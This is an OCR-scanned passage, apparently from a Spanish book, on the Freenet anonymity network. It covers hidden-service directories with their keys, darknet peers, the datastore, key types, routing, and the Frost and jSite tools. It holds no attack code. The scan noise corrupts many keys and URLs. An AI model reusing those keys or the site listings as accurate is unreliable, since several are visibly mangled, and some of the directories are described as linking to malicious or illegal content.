kI3DW~i9xHCHd-Bu9k,AQACAAE/linkageddon/1121/ 
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Nombre del servicio. 


Linkageddon 


Descripcion. 


Directorio que contiene varios enlaces a servicios ocultos en la web profunda de Freenet. Se 
actualiza frecuentemente, pero contiene bastantes contenidos que pueden ser maliciosos u 
ofensivos, los cuales se encuentran marcados en rojo para advertir al usuario. _ 


Clave freenet. 

USK@tiYrPDh~fDeH5V7NZjpp~QuubaHwgks88iwlRXXLLWA,yboLMwXld 

Chz8fWK.jmbdtl38HR5uiCOdIUT86ohUyRg.AQACAAE/nerdageddon/190/ 

Nombre del 

servicio. 

Nerdageddon 

Descripcion. 

Directorio que se basa en Linkageddon, pero se actualiza frecuentemente y existe bastante control 
sobre contenidos maliciosos u ofensivos. 


Clave freenet. 

USK@XJZAi25dd5y7lrxE3cFIMmM-xZ-c- 
hlPpKLYeLC0YG5I,8XTbR 1 bd9RBXlX6j-OZNednsJ8C16EAeB 
BebC3jtMFU,AQACAAE/index/486/ 

Nombre del servicio. 

Enzo's Index 

Descripcion. 

Directorio de sitios en la web profunda de Freenet mucho mas elaborado que Linkageddon o 
Nerdageddon ya que permite aplicar filtros y los enlaces se encuentran distribuidos por categorias. 


USK@XJZAi25dd5y71rxE3cHMmM-xZ-c- 

Clave freenet. hlPpKLYeLCOYG5I,8XTbRlbd9RBXlX6j-OZNednsJ8C16E 

AeB BebC 3jtMFU, AQ ACAAE/index/486/ _ 

Nombre del servicio. _ Gatros Index _ 

Descripcion.__ 

El directorio de “Enzo” era mantenido por un usuario en Freenet que se encargaba de tenerlo 
actualizado y eliminar contenidos maliciosos. No obstante, hace algun tiempo anuncio que iba a 
abandonar la administracion de dicho sitio y publico el codigo y todos los elementos necesarios 
para montar su Freesite en otro dominio en Freenet o simplemente para su estudio y/o mejora. 
“Gatros” es un usuario de Freenet que ha desplegado el software de “Enzo” en un nuevo dominio 
y como resultado, el directorio de “Gatros” es visualmente igual al directorio de “Enzo”, pero con 
mas enlaces, categorias y actualizaciones. _ 


Clave freenet. 

USK.@XJZAi25dd5y71rxE3cHMmM-xZ-c- 
hlPpKLYeLC0YG5I,8XTbR 1 bd9RBXlX6j-OZNednsJ8C16E 
AeBBebC3jtMFU,AQACAAE/index/486/ 

Nombre del servicio. 

Cactus Land 

Descripcion. 

Directorio con enlaces a Freesites en ingles y frances. 
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3.1.2.1.2 Foros, wikis y documentacion 


Clave freenet. 

USK@pbLjE-km2AvmVjLnHTJuy0oyz5- 

kiHfBOl~g5eqqmKg,ihxXYe0bwhluP-h3uqx6fTumoUv9bQGxwIdICMt 
hMgI,AQACAAE/rechnology Comer/l 03/11 .html 

Nombre del servicio. 

FreeReader 

Description 

Feeds en Freenet de algunos de los sitios en Internet tan populares como wired, slashdot, 
lifehacker, entre otros. Un servicio que permite acceder a los ultimos articulos publicados en 
dichos sitios de forma anonima desde Freenet. 


Clave freenet. 

USK@gMF~XKZtOpi3i2EC8TL2CaNsD5te2Y 119nrzkwaTqbw,bXwkJlgwItb8 
HyfHmyu3xJiiMK9jTTBR0j0AMkdVLkE,AQACAAE/p2pj)apers/3/ 

Nombre del 

servicio. 

P2P Papers 

Description 

Documentacion muy completa sobre investigaciones en el campo del anonimato y las redes P2P 


Clave freenet. 

I JSK®.2iRNDcxlHn~eurSPOd9Ai4xIv5hAsa WKxlcNZPT 

pbJ8,sAY-hDhxDpb8VkXOcPgH~Dj—Oqcf2uRkQ67Lr2io- 
U,AQACAAE/lawiki.i2p/6/ 

Nombre del servicio. 

LaWiki 

Description 

Se trata de un cion del servicio oculto “LaWiki” que se encuentra disponible en I2P. Como se 
ha mencionado en el capltulo destinado a I2P, este servicio oculto es una wiki en castellano con 
varios manuales sobre el uso de red anonimas y medidas de protection para mantener unos buenos 
niveles de privacidad y anonimato. 


Clave freenet. 

USK@ldoG4wfofCUOCmQ~tCgVuA8RewjV57oIsGCQ9PWrSUo,G4 
bXzX7keOFMXE97aG 1 FSRTkp ARxcOf 1 WQ3GkKStyVk,AQACAAE/ 
flog/38/ 

Nombre del servicio. 

Apuntes de un comunista 

Description 

Se trata de un “flog” en castellano en el que se habla sobre temas de actualidad desde una 
perspectiva fresca y con un toque muy personal por parte su autor. 


Clave freenet. 

USK@lmOjJXO4eNuI-aLw2mSHPKClsg7D~N8Ggp7cw0NKFlU,De 
50fFQYik~xaFV~FIMNahq2g84ul 1 qlvfEx4JEKtNwI,AQACAAE/flog/l/ 

Nombre del servicio. 

Hablemos de videojuegos 

Description 

Se trata de un blog en castellano sobre videojuegos y gamers. 
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3.1.2.1.3 Servicios varios 


Clave freenet. 

USK@oRy71tZLJM-w-kcOBdiZS 1 pAA8P- 
BxZ3BPiiqkmfk0E,6alICFG6S-Bwp6E-MplW52iH~Y3La6 
GigQVQDeMjI6rg,AQACAAE/deb. mempo.org/61/ 

Nombre del servicio. 

Mempo 

Descripcion 

Se trata de un servicio que se basa completamente en el sistema “Mempo”, el cual esta conformado 
por un conjunto de herramientas y librerias que funcionan sobre sistemas basados en Debian y 
que intenta mejorar la seguridad, privacidad y anonimato del sistema. Ademas de este servicio 
ncnlto. tambien hav abundante docnmenracion en el sieuiente enlace: https://wiki.debian.ora/ 
Memno#Install Mempo 


Clave freenet. 

USK.@61CwbWgaJH~-rMHo 1 DmxTearAkeLgaOCvImnb 
h017yao,XC4FEhpQIh6p3dy7AynyLXeRNyj9yCsYLOX- 
k3KMJOU,AQACAAE/crypto-work/3/ 

Nombre del servicio. 

Crypto-work 

Descripcion 

Herramientas e informacion tecnica sobre seguridad en comunicaciones y anonimato. 


Clave freenet. 

USK@fIkEtTMu6F3f7Y48dB4mmZiyFbB- 

iddMGBvtruSE3Vc,sFglGrDfJ-k6BE8VmqqQjw~iOgOK.u- 

aws81aw90GeY8,AQACAAE/'agorism/3/ 

Nombre del servicio. 

Agorism.info 

Descripcion 

Documentacion variada sobre anarquismo y agorismo. Este servicio se basa completamente en los 
contenidos que se encuentran disponibles en el sitio: httn://www.aaorism.info/ 


3.2 Arquitectura 

A continuacion se explicara en detalle la arquitectura de Freenet y los principales elementos que la 
componen. 


3.2.1 Darknets en Freenet 

El fimcionamiento de Freenet es muy similar al de I2P debido a que siguen el mismo modelo de 
funcionamiento “ inproxy ”, en el que los usuarios podran establecer conexiones seguras al interior 
de la red y tienen la capacidad de enrutar trafico y almacenar informacion. Evidentemente existen 
algunas diferencias a nivel tecnico y funcional y una de las mas llamativas y que desde luego 
representa una ventaja de Freenet sobre I2P es su capacidad de poder crear redes privadas al interior 
de Freenet, las cuales como se ha mencionado anteriormente, son comunmerite conocidas como 
“darknets intemas”. Una “ darknet ” al interior de Freenet le permite a un usuario definir grupos 
privados de “amigos” con los cuales se podra comunicar de forma anonima. Este esquema es sin 
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duda mucho mas seguro que permitir que cualquier enrutador pueda contactar con la instancia local 
del usuario, sin embargo es mucho mas lento y el rendimiento suele ser muy pobre, especialmente 
cuando se tiene pocos “amigos” adicionados en la instancia, de hecho, para poder crear una “darknet 
al interior de Freenet, uno de los requisitos obligatorios es que se encuentre conformada por al 
menos cinco integrantes. Este es solamente uno de los requisitos y aunque es el mas importante, 
tambien debe cumplir con otras condiciones y hay que tener en cuenta ciertas consideraciones que 
pueden afectar en gran medida el anonimato de un usuario de Freenet: 

1. Los “ friends ” son un mecanismo seguro para interactuar con la red de Freenet por medio de 
un grupo cerrado de nodos con unos niveles de confianza minimos, esto quiere decir que todo 
el trafico que viajara desde la instancia local, pasara por medio de dichos “friends”, los cuales 
podrian simplemente capturar todo el trafico que pasa por sus interfaces de red aunque el destino 
de dichos paquetes no sean ellos. 

2. Para que el mecanismo de ‘ ‘friends ” funcione adecuadamente, la comunicacion y la confianza 
debe establecerse en doble sentido, esto quiere decir que no basta con que un usuario adicione a 
otro como “ friend ”, el nodo adicionado debe aceptar dicha solicitud de union y para hacerlo debe 
adicionar como “ friend ” al solicitante. Esta es la forma en la que se garantiza la comunicacion 
bidireccional entre ambos nodos y evidentemente, se establece una relation de confianza que no 
es recomendable si no se conoce a la otra persona. 

3. Cuando un usuario adiciona a un ‘ ‘friend ” y el destinatario de dicha solicitud la acepta, 
ninguno de los dos nodos podra interactuar y/o ver los “ friends ” que tiene el otro, a menos que 
sean comunes a ambos. 

4. Todo el trafico entre los nodos “ friends ” viajara cifrado, lo que quiere decir que es dificil para 
cualquiera de ellos conocer exactamente que tipo de information esta transportando alguno de 
los otros nodos. 

Agadir otro contacto 

Introduzca la referenda del nodo directamente: 


Introduzca aquf la URL de la referenda: 

Elija aqui un documento que contenga una referenda: Examiner... No se ha seleccionado ningun archivo. 

^Cuanto confias en este amigo? Cuanto mbs alto sea el nivel de confianza. mbs informacion comparting Freenet, pero esto te hace mas vulnerable si el 
ordenador de este amigo es incautado o hackeado, o es malvado. 

ALTO: Confio en mi amigo y en su habilidade para proteger su ordenador. Comparte toda la informacibn posible para maximizar el rendimiento. 

• NORMAL: Confio poco en mi amigo. Compartir alguna informacibn, pero toma algunas precauciones. Ganacia de rendimiento moderada. 

BAJO: No confio en mi amigo. Comparte tan poca informadbn como puedas. Bajo rendimiento. Ten en cuenta que aim asi es mbs seguro que conectarse a 
desconocidos en casi todos los casos. 

iQuiere que el resto de sus amigos pueda ver y conectarse a este amigo? Si permites que tus amigos vean este amigo, y este amigo ve tus amigos, 
mejorara el rendimiento de modo considerable. Pero puede ser que no quieras que tus otros amigos sepan de este (pero ten en mente que cualquiera que pueda 
ver tu conexibn a internet podrla se capaz de vinculario contigo). El/ella puede tambien deshabilitar el ser visto por tus amigos. 

s SI: Contarie a mis otros amigos sobre este amigo, y contarle a este amigo sobre mis otros amigos. Ellos seran capaces de conectarse inmediatamente 
aunque me encuentre desconectado, mejorando el rendimiento de modo considerable. 

SOLO NOMBRE: Contarle a este amigo de los apodos de otros amigos, y a los otros amigos del apodo de este amigo, para que si se conocen, se puedan 
conectar entre si. 

NO: No contarie a mis amigos sobre este amigo y no permitirtes a otros amigos que comuniquen mi existencia: Ellos son un contacto oculto. 

Proporcione la descripcion: 

Anadir_ 


Imogen 03.05: Anadir contactos a una Darknet de Freenet. 
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Para adicionar o gestionar Friends en la instancia local de Freenet, es necesario dirigirse a 
“http://127.0-0.1:8888/friends/”. Como se puede ver en la imagen 03.05, es posible agregar un 
nuevo contacto adicionando su correspondiente referenda en el campo de texto destinado para ello. 

Para que otros nodos puedan adicionar a la instancia local como “ friend ”, tambien es necesario que 
conozcan la referencia del nodo, por este motivo al final de la pagina web anterior se encuentra la 
referencia del nodo local, la cual debe ser entregada a los contactos que se han agregado. 



Imogen 03.06: Referencia de un nodo local en Freenet. 


3 . 2.2 Almacenamiento de datos: Datastore en Freenet 

Freenet es una red que se caracteriza por forzar a todas las instancias a aportar una pequena porcion 
para almacenamiento en disco duro. Dicho espacio es conocido como “ datastore ” y es utilizado para 
almacenar los contenidos que otros usuarios comparten en la red. Una instancia de Freenet tiene muy 
poco control sobre lo que se almacena en dicho espacio, ya que se encuentra ciffado y su principal 
objetivo es que los contenidos se encuentren disponibles en la mayor cantidad de “ datastores ” en la 
red. Bajo este esquema de funcionamiento, los contenidos son resistentes a la censura y a diferencia 
de otras redes similares como I2P o Tor, su disponibilidad se encuentra garantizada en funcion al 
numero de instancias que almacenen dicho contenido. 

Esto quiere decir que la disponibilidad de un contenido dado, depende directamente de su 
popularidad, ya que entre mas instancias o clientes de Freenet intenten acceder a dicho contenido, 
este se descargara de forma automatica en cada “ datastore '’. Si una instancia de Freenet se 
encuentra detenida, es posible que los contenidos que se encuentran almacenados en su “ datastore ” 
local se encuentren replicados en los espacios de almacenamiento de otras instancias de Freenet 
que si se encontraran activas y como consecuencia, otros usuarios podran acceder al contenido 
almacenado (siempre y cuando se conozca la clave del contenido). Como seguramente el lector se 
podra imaginar, se trata de un sistema de almacenamiento distribuido y muy eficiente para evadir la 
censura y asegurar la disponibilidad de los contenidos, evitando el problema de los servicios ocultos 
itinerantes tan frecuente en otras redes anonimas. 
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Como se ha explicado anteriormente, los contenidos que se almacenan en el “ datastore ” de una 
instancia de Freenet se encuentran cifrados y el usuario no tiene control sobre dichos ficheros, el 
proceso de insertion y borrado de los contenidos que alii se almacenan se basa en la caducidad de 
los mismos, los cuales son eliminados de forma automatica cuando ninguna de las instancias de 
Freenet en la red lo consultan despues de cierto tiempo. Esto quiere decir que para que un contenido 
sea eliminado de una instancia, ningun usuario de la red debe consultarlo y con el tiempo terminara 
siendo borrado por caducidad. Este mecanismo permite que la red contenga unicamente aquellos 
contenidos que son de interes para los usuarios y aquellos que son accedidos con poca frecuencia, 
terminaran siendo eliminados con el tiempo. 

Despues de leer detenidamente los parrafos anteriores y reflexionar sobre las posibles consecuencias 
de utilizar un modelo distribuido como el de Freenet, probablemente el lector sentira cierta 
preocupacion sobre aquellos contenidos que se encuentran en el espacio cifrado que genera 
la instancia de Freenet para almacenar contenidos propios y de otros usuarios, ya que como se 
ha mencionado antes, el control que se tiene sobre este espacio es practicamente nulo, pudiendo 
almacenarse cualquier tipo de contenido, legal o ilegal. No obstante debido a esta situacion y al 
poco control que tiene el usuario sobre dicho espacio de almacenamiento, podria ser valido alegar la 
“negation plausible” sobre el conocimiento de los contenidos almacenados, esto es especialmente 
valido en el caso de que una entidad fiierte, con suficientes recursos tecnologicos consiga descifrar 
sus contenidos, una labor que desde luego no es nada facil. 

Por otro lado, los contenidos almacenados en cualquier “ datastore ” no incluyen bajo ningun 
concepto metadatos o information identificativa que los vincule al propietario de la instancia de 
Freenet. El espacio reservado para el almacen de datos de una instancia de Freenet es el 5% de 
espacio disponible en disco si su capacidad es superior a 20GB, 10% si es mayor a 10GB, 512MB 
si es menor a 10GB, y 256MB si es menor a 5GB. El tamano de dicho espacio se puede cambiar en 
cualquier momento. Obviamente, el equipo de Freenet recomienda compartir la mayor cantidad de 
espacio posible para mejorar la navegacion por Freesites y otros servicios disponibles en Freenet, 
asi como para mejorar el rendimiento y disponibilidad general de los contenidos al interior de la red. 
Freenet permite la configuracion del almacen de datos de una instancia y para evitar cualquier tipo 
de confusion a la hora de modificar las multiples opciones de configuracion de un nodo de Freenet, 
conviene aclarar que el termino “ datastore ” del que se ha hablado en repetidas ocasiones, se refiere 
a la configuracion de un espacio conocido como “cache” mas el almacen de datos principal. La 
combination de ambas secciones corresponde a la portion de los datos mas importantes para el 
comportamiento de la red. 

El almacen de datos y la memoria cache trabajan juntos para proporcionar el almacenamiento 
principal de la red (“ datastore ”). La cache es simplemente una copia de cada bloque de datos que 
pasa a traves del nodo. Esta memoria suele llenarse rapidamente y cuando esto sucede, los bloques 
antiguos se eliminan para hacer espacio a los nuevos. Para mitigar el hecho de que la cache suele 
llenarse rapidamente y los bloques antiguos se eliminan con cierta frecuencia, tambien hay un 
almacen de datos persistente. Por otro lado solo una fraccion de los bloques que pasan por el nodo 
consiguen ser guardados en el almacen de datos, solo aquellos bloques que debido a su ubicacion, 
tienen mejores posibilidades de ser encontrados con respecto a otros nodos adyacentes. Debido a 
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esto, el almacen de datos tarda mas en llenarse y los bloques antiguos tardan mas tiempo antes de 
ser sobrescritos. 

Los valores por defecto de estos espacios de almacenamiento se pueden editar muy facilmente desde 
la aplicacion “ FProxy ”, concretamente en la seccion correspondiente a “Configuracion —> Ajustes 
esenciales”. Tambien se puede acceder a dicha pagina de configuracion accediendo a la siguiente 
ruta: http://localhost:8888/config/node. 


La imagen 03.07 ensena las principales opciones de configuracion que permiten establecer los 
tamanos a la cache y el almacen de datos, ambas secciones como se ha mencionado antes, conforman 



Imagen 03.07: Configuracion de los espacios de almacenamiento en Freenet. 


3.2.3 Funcionamiento de las claves en Freenet 

Como se ha explicado en secciones anteriores de este capitulo, los ficheros almacenados en un nodo 
de Freenet se pueden encontrar replicados en otros nodos que contienen una copia de este mismo 
fichero en formato comprimido, fragmentados en trozos de 32KB y cifrados, lo que permite que los 
contenidos se encuentren descentralizados y acceder a ellos sea mucho mas sencillo dependiendo 
de su popularidad, es decir, la frecuencia con la que otros nodos en la red descargan y almacenan el 
contenido en el “ datastore ” de su instancia. Sin embargo, para que la informacion que se almacena 
en cada nodo pueda ser identificable y sobre todo, descifrada por otros nodos, los contenidos se 
encuentran vinculados a diferentes tipos de claves. Dichas claves son simplemente hashes que 
no guardan ningun tipo de relation con el contenido del fichero o su “semantica”, lo que quiere 
decir que las claves no revelan ningun tipo de detalle sobre el contenido. Para acceder a cualquier 
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contenido en Freenet, es necesario conocer la clave que tiene asociada y ademas, existen diferentes 
clasificaciones las cuales se explicaran a continuation. 

Los tipos de claves en Freenet son: CHK (Content Hash Key), SSK (Signed Subspace Key), USK 
(Updatable Subspace Key) y KSK (Keyword Signed Key). 

Claves CHK (Content Hash Key) 

Un hash es el resultado de convertir una pieza de datos en un numero relativamente pequeno que 
funciona como “fingerprint" identificativo de dicha pieza de datos, esto quiere decir que de este 
modo, si por algun motivo el contenido del fichero cambia, aunque se trate de un cambio pequeno, 
el hash del fichero cambia completamente. Teniendo esto claro, una clave CHK es el tipo mas 
habitual y conocido. Los contenidos con este tipo de clave corresponden a ficheros estaticos, tales 
como documentos de texto, videos, PDF, etc. Donde la CHK es simplemente el hash del contenido 
del fichero que identifica de forma unica al mismo. De esta forma, no es posible que dos ficheros 
con contenidos diferentes, tengan el mismo CHK. Este tipo de clave se compone de las siguientes 
secciones: 

- Hash del fichero. 

- Clave de descifrado que permite acceder al fichero en texto legible 

- Configuracion criptografica usada. 

El formato de este tipo de direcciones es el siguiente: 

CHK@hash, clave descifrado, config. criptografica 

La clave de descifrado se encuentra almacenada en el interior del fichero, por lo tanto no es posible 
descifrar el fichero sin la clave CHK correspondiente. 

Claves SSK (Signed Subspace Key) 

Se trata de claves que identifican contenidos dinamicos que cambian con bastante ffecuencia, como 
por ejemplo los servicios ocultos que estan relacionados con Freesites. Funcionan de tal fomia que 
se pueden actualizar los contenidos de forma distribuida con un mecanismo de no repudio, lo que 
quiere decir que nadie puede modificar un contenido con este tipo de claves y afirmar que ha sido 
alguien mas quien lo ha hecho. Funciona con criptografla de clave publica, de esta forma el autor 
de un sitio web puede firmar sus contenidos y solamente las personas que tienen la clave privada 
podran realizar modificaciones sobre dicho contenido. A diferencia de las CHK, las SSK contienen 
5 partes: 


- Hash de clave publica: Fingerprint del fichero. 

- Clave de descifrado del documento: Solamente conocida por los clientes y no por los 
nodos que almacenan datos, asi que ningun nodo puede descifrar estos datos sin la direction 
completa, en este sentido funciona exactamente igual que las claves CHK. 

Configuracion criptografica usada. 

- Nombre seleccionado por el usuario. 
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- Version actual del contenido. Numero que se increments cada vez que existe una 
modification en el contenido. 

El formato de este tipo de direcciones es el siguiente: 

SSKghash, clave descifrado, config. Criptografica /NOMBRE_CONTENIDOOSITIO, NOMERO_VER- 
SION 

Para que este tipo de clave funcione correctamente, se sigue el siguiente procedimiento: 

1. El autor crea una clave asimetrica (clave publica y privada para firmar el contenido) 

2. El autor crea una clave simetrica (clave para realizar el proceso de cifrado y descifrado) 

3. El fichero es cifrado con la clave simetrica y firmado con la clave privada y la firma se 
almacena en el fichero, los nodos solamente almacenaran la clave publica, por lo tanto ningun 
nodo podra conocer realmente el contenido que esta almacenando ya que no dispone de la clave 
para descifrar el contenido. 

Claves USK (Updateable Subspace Keys) 

Se trata de un tipo de claves que sirven de envoltorio para las claves del tipo SSK, de hecho las USK 
son SSK, la diferencia radica en que las claves USK se encargan de enlazar la ultima version del 
contenido vinculado con la clave SSK en cuestion. Es mucho mas sencillo de utilizar ya que oculta 
todo el proceso de busqueda de las ultimas versiones de un contenido con clave SSK. 

El formato de este tipo de direcciones es el siguiente: 

USK@hash, clave descifrado, config. Criptografica /NOMBRE_SITIO, NUMERO_VERSION 

Dependiendo del valor positivo o negativo del numero de la version, el comportamiento cambia tal 
como se explica a continuation. 

Numero de version positivo 

El nodo local mantiene una lista de las versiones que conoce de un contenido, sin embargo solamente 
conoce la version ya que los datos pueden estar o no estar almacenados en el datastore local y es 
una lista que se actualiza constantemente dependiendo de las ultimas visitas realizadas al contenido. 

Cuando se busca un numero de version positivo, se busca en la lista local de versiones por la version 
especificada o una superior y en el caso de que encuentre alguna, siempre retornara el valor superior, 
mientras tanto, en un proceso independiente en background se realiza una busqueda de nuevas 
versiones que aun no se encuentran incluidas en el listado de versiones local para adicionar dichos 
numeros en el registro de USK local. 

Por ejemplo, asumiendo que se solicita una clave como la siguiente, el proceso de busqueda sera 
como se indica. 

USKghash, clave descifrado, config. Criptografica /sitioweb, 10 
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Lo anterior buscara en el listado la version 10 o una superior, una vez encontrada dicha version, 
inicia un proceso para actualizar el listado local, pero el contenido que se sirve al usuario es el 
correspondiente a la version especificada. 

Numero de version negativo 

Al indicar un numero negativo como parametro, se realiza una busqueda profunda. En este caso, 
se intentara obtener las siguientes cuatro versiones sobre el numero indicado en el nodo local y en 
otros nodos conocidos. El proceso de busqueda se realiza en un ciclo incremental de cada cuatro 
versiones, el cual se interrumpe cuando ya no es posible encontrar las cuatro versiones siguientes ni 
en el nodo local ni en ninguno de los conocidos por la instancia, de esta forma existe cierto nivel de 
seguridad de que siempre se va a obtener la ultima version disponible del contenido. 

Por ejemplo, si se indica la siguiente clave, el proceso de busqueda sera como se indica. 

USKShash,clave descifrado, config. Criptografica /sitioweb, -5 

El nodo de Freenet buscara las siguientes cuatro versiones (5 ... 9) si se encuentra la version “9” 
buscara las 4 siguientes (9 ... 13). Este bucle se repetira de forma consecutiva hasta que ya no sea 
posible encontrar alguna de las versiones. Dado que es una busqueda que se realiza en el nodo local 
de y en otros nodos conocidos, se trata de una busqueda que tardara mucho mas que la busqueda 
anterior indicando un valor positivo. 

Claves KSK (Keyword Subspace Keys) 

Se trata claves en Freenet que le permiten a un usuario almacenar paginas etiquetadas directamente 
en la red de Freenet (paginas o ficheros de texto piano) su formato es muy simple: 

KSK@contenido.html 


Como se puede apreciar, se trata del tipo de clave mas simple pero no son claves que sean seguras 
contra el spam o “ hijacking ” del nombre del fichero, ademas es posible que el nombre del fichero 
ya haya sido utilizado anteriormente por otro usuario en la red y en tal caso, el sistema de detection 
de colisiones evitara la sobreescritura de una pagina previamente creada por alguien con el mismo 
nombre pero con un contenido distinto. 

La description de la clave KSK no debe contener barras o caracteres especiales, ya que dichos 
elementos suelen ser tratados de forma diferente por el nodo de Freenet a la hora de crear la clave. 
Finalmente, una direction del tipo KSK puede fiincionar o bien como se ha explicado anteriormente, 
o realizar una redirection a otra direction del tipo CHK, algo que se vera en las proximas secciones 
de este documento. 


3.2.4 Enrutamiento en Freenet 

Ahora que se ha explicado el formato de las claves en Freenet y se ha visto la forma en la que se 
estructuran los contenidos en diferentes tipos de claves, es el momento de explicar la forma en la que 
los nodos de la red encuentran information por medio de dichas claves. 
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En primer lugar, tanto las claves como los nodos estan vinculados a una localizacion y dicha 
localizacion es simplemente un valor decimal entre 0 y 1 (exclusivo). Cuando un nodo en Freenet es 
iniciado por primera vez y se selecciona el modo de fiincionamiento “opennef ’ en el que se admiten 
conexiones con cualquier nodo de la red. Las localizaciones son seleccionadas por el algoritmo de 
generacion de localizaciones de Freenet y dicho valor se mantiene fijo, no obstante, en el caso de 
que el nodo sea iniciado en modo “ darknef' en el que se admiten conexiones solamente con los 
nodos “friends", las localizaciones pueden cambiar dinamicamente. Las claves son asignadas a una 
localizacion por medio de un algoritmo de asignacion que se basa o bien en el hash de los datos para 
las claves del tipo CHK o en el hash del nombre del documento y la clave publica en el caso de las 
claves del tipo SSK, USK y KSK. Por otro lado, las localizaciones son una lista circular y sirven 
para calcular la distancia entre los nodos que componen la red, de este modo, si la localizacion de 
un nodo es “0.98” y la localizacion de otro es “0.02”, la distancia entre ambos nodos es de “0.04”. 

Con la informacion sobre la localizacion de una clave y uno o varios nodos, una instancia de Freenet 
puede realizar el proceso de enrutamiento correspondiente, a saber, cuando un nodo recibe una 
peticion para obtener los contenidos de una clave determinada, en primer lugar verifica si es capaz 
de contestar a la peticion del vecino buscando en su propio almacen de datos (datastore) por dicha 
clave. En el caso de que no cuente con los contenidos de la clave solicitada, el nodo consulta los 
campos “ plnstantRejecf ’ y HTL (Hops To Live) para determinar si la solicitud debe ser enrutada 
al siguiente nodo o definitivamente debe ser descartada. En el caso de que la solicitud deba ser 
tratada, el nodo selecciona un listado de los nodos que en algun momento han contestado a la clave 
solicitada, esto le permite saber exactamente cual es el camino mas optimo y que ha dado mejores 
resultados en el pasado, por este motivo algunos nodos en Freenet tienen mejor “reputacion y 
son conocidos en la red por responder a claves con un rango de localizaciones determinadas. En el 
caso de que la clave en cuestion sea completamente desconocida por el nodo receptor, se genera un 
listado de los nodos cuyas localizaciones sean las mas proximas a la localizacion de la clave. 

Finalmente, utilizando el listado de los nodos que potencialmente podrian contestar a la peticion, 
el nodo receptor se encarga de comenzar por aquellos cuya localizacion sea la mas cercana a la 
localizacion de la clave solicitada. En el caso de que alguno de los nodos sea capaz de contestar a 
la peticion y devolver la informacion relacionada con la clave solicitada, el nodo receptor almacena 
la clave y el fichero en su almacen de datos local y responde a la peticion iniciada por el nodo 
solicitante. Una de las ventajas de este modelo es que los contenidos se distribuyen en localizaciones 
concretas y se expande en la medida que los usuarios utilizan la red. Por este motivo, una de las 
mejores formas de contribuir a Freenet consiste simplemente en navegar por Freesites y consultar 
claves concretas a otros nodos, asi como tener un almacen de datos lo suficientemente grande como 
para guardar el maximo numero posible de claves y contenidos. 




3.3 Gestion de servicios y complementos en Freenet 

En cualquier nodo de Freenet existen varias aplicaciones y utilidades que facilitan su gestion y uso, 
ademas de permitir extender las funcionalidades que vienen incluidas por defecto. Ahora que se 
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ha explicado el funcionamiento de los “ datastores ” y cuales son los diferentes tipos de claves que 
maneja Freenet para sus contenidos, es el momenta de comenzar a utilizar las aplicaciones que dan 
soporte estos conceptos que hasta este momenta han sido mas teoricos que practicos. Algunas de las 
aplicaciones mas comunes en Freenet ya se encuentran incluidas en cualquier instalacion estandar, 
sin embargo existen otras que es necesario instalar de forma independiente. En esta seccion se 
hablara de dichas aplicaciones y su uso. 


3.3.1 Frost 

Se trata de una de las aplicaciones mas populares en Freenet ya que permite interactuar con todos 
los tablones de anuncios de Freenet en tiempo real, asi como compartir ficheros con otros usuarios 
que se encuentren conectados. Permite subir, descargar y compartir informacion de una forma facil 
y sobre todo, anonima. Antiguamente era una aplicacion que se encontraba incluida en algunas de 
las primeras instalaciones estandar de Freenet, sin embargo en las ultimas versiones disponibles 
es necesario descargar la herramienta de forma independiente. Para descargar Frost, es necesario 
dirigirse al sitio web oficial del proyecto, el cual se encuentra alojado en la siguiente direccion: 
http://jtcfrost.sourceforge.net/ 

Una vez descargado el fichero comprimido correspondiente al software de Frost, se debe 
descomprimir y utilizar el ejecutable que viene incluido en el directorio raiz con el nombre “frost, 
sh”. Es necesario darle privilegios adecuados para que pueda ejecutarse: 

>chmod 755 frost.sh 
>./frost.sh 


Dado que se trata de una aplicacion escrita en Java, es necesario tener instalada la maquina virtual de 
Java en el sistema en el que se ejecuta Frost. Lo primero que solicita la aplicacion, es el puerto por 
el cual iniciara el servicio, el cual utiliza el protocolo FCP2 (FreeNet Client Protocol 2). Tal como 
se ensena en la imagen 03.08 es posible cambiar el valor por defecto (127.0.0.1:9481). 



Imogen 03.08: Inicio de Frost. 
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Una vez realizada la conexion, se pueden observar diferentes foros, los cuales corresponden a 
una categoria concreta, no obstante tambien es iraportante anotar que la cantidad de contenidos 
indeseables e ilegales en algunos de dichos tableros puede resultar agobiante, ya que como se ha 
mencionado antes, los usuarios envlan mensajes y ficheros en tiempo real y evidentemente no existe 
ningun tipo de restriccion o control sobre los mensajes que all! se pueden ver. 



Imogen 03.09: Foros publicos de Freenet con Frost. 


El uso de Frost es muy intuitivo y no suele dar problemas, sin embargo, es necesario que desde 
Freenet se encuentre habilitado el puerto FCP que por defecto es el 9481. Dicha configuracion se 
puede consultar en la siguiente ruta: http://127.0-0.l:8888/config/fcp 

En el caso de que la aplicacion no se inicie correctamente, es probable que sea necesario editar el 
fichero de configuracion de la aplicacion ubicado en <FROST HOME>/config/frost.ini y establecer 
la siguiente opcion “AvailableNodes = 127.0.0.1:9481”. 


3.3.2 JSite 

La posibilidad de crear darknets y freesites son algunas de las caracteristicas mas interesantes en 
Freenet. Los freesites son servicios ocultos con bastantes similitudes a los “ eepsites ” de I2P, pero 
con la diferencia de que los contenidos web de un freesite se diseminan y distribuyen por la red de 
Freenet, garantizando de esta forma su disponibilidad. Una de las aplicaciones mas populares a la 
hora de publicar freesites en Freenet es la aplicacion “ JSite ”, la cual se encuentra desarrollada en 
Java y es muy facil de utilizar. La aplicacion debe ser descargada desde el siguiente enlace: http:// 
downloads.freenetproject.org/alpha/jSite/jSite.jar 
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Despues de descargar la herramienta, se puede ejecutar utilizando la maquina virtual de Java. 


>java -jar jSite.jar 



Imogen 03.10: Interfaz de JSite para geslionar Freesiles. 


Tal como puede apreciarse en la imagen 03.10, se trata de una aplicacion de escritorio que permite 
gestionar proyectos, los cuales seran publicados en Freenet. La primera interfaz de la aplicacion 
solicita el ingreso de los datos basicos del proyecto. Casi todos los campos son generados de forma 
automatica, solamente el nombre del proyecto y la ubicacion de los contenidos son requeridos. 
La imagen 03.11 ensena los ficheros que se encuentran incluidos en el directorio local que se ha 
ingresado en la primera pantalla que ensena la aplicacion. Es recomendable marcar la option 
“Default File’'’ con la pagina HTML o recurso por defecto que sera ensenado al usuario cuando 
visite el sitio web. 


Project Files - jSite 


Languages Nodes Help 

Project Files 

On this page you can specify parameters for the files within the project, such as 
externally generated keys or MIME types, if the automatic detection failed. 
Toms/mypnn.ui is-i« i d ni mgs ~ - r g g cj r j i~ .svg - 

fonts/glyphicons-halflings-regular.ttf 
fonts/glyphicons-halflings-reguiar. woff 
fonts/glyphicons-halflings-regular.woff 2 
